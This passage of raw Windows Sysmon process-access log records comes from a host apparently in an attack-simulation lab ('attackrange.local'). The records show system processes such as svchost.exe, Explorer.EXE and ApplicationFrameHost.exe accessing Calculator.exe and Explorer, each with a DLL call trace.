indows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362340Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.819{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362339Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.819{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000362338Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.819{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362337Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.819{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000362336Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.804{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362335Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.804{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362334Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.804{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+374d7|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362333Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.804{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+37271|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362332Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.804{8e433fbf-337b-6013-8402-000000001100}16562144C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\TaskFlowDataEngine.dll+cded0|C:\Windows\System32\TaskFlowDataEngine.dll+971db|C:\Windows\System32\TaskFlowDataEngine.dll+9685f|C:\Windows\System32\TaskFlowDataEngine.dll+96359|C:\Windows\System32\TaskFlowDataEngine.dll+95d85|C:\Windows\System32\TaskFlowDataEngine.dll+93be5|C:\Windows\System32\TaskFlowDataEngine.dll+925b8|C:\Windows\System32\TaskFlowDataEngine.dll+9cf11|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362331Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.804{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362330Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.804{8e433fbf-337b-6013-8402-000000001100}16569740C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+1dbfa|C:\Windows\System32\NPSMDesktopProvider.dll+139e2|C:\Windows\System32\NPSMDesktopProvider.dll+1415b|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362329Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.804{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+2aff6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362328Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.804{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.pcshell.dll+320f9|C:\Windows\system32\twinui.pcshell.dll+31966|C:\Windows\system32\twinui.pcshell.dll+14b85|C:\Windows\system32\twinui.pcshell.dll+11de6|C:\Windows\system32\twinui.pcshell.dll+1a72c|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362327Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.804{8e433fbf-337b-6013-8402-000000001100}16568412C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\TaskFlowDataEngine.dll+cded0|C:\Windows\System32\TaskFlowDataEngine.dll+971db|C:\Windows\System32\TaskFlowDataEngine.dll+96e76|C:\Windows\System32\TaskFlowDataEngine.dll+93c96|C:\Windows\System32\TaskFlowDataEngine.dll+925b8|C:\Windows\System32\TaskFlowDataEngine.dll+9cf11|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362326Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.804{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362325Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.804{8e433fbf-337e-6013-9402-000000001100}75849880C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362324Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.788{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000362323Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.788{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362322Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.772{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362321Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.772{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362320Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.772{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362319Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.772{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362318Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.757{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362317Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.757{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program 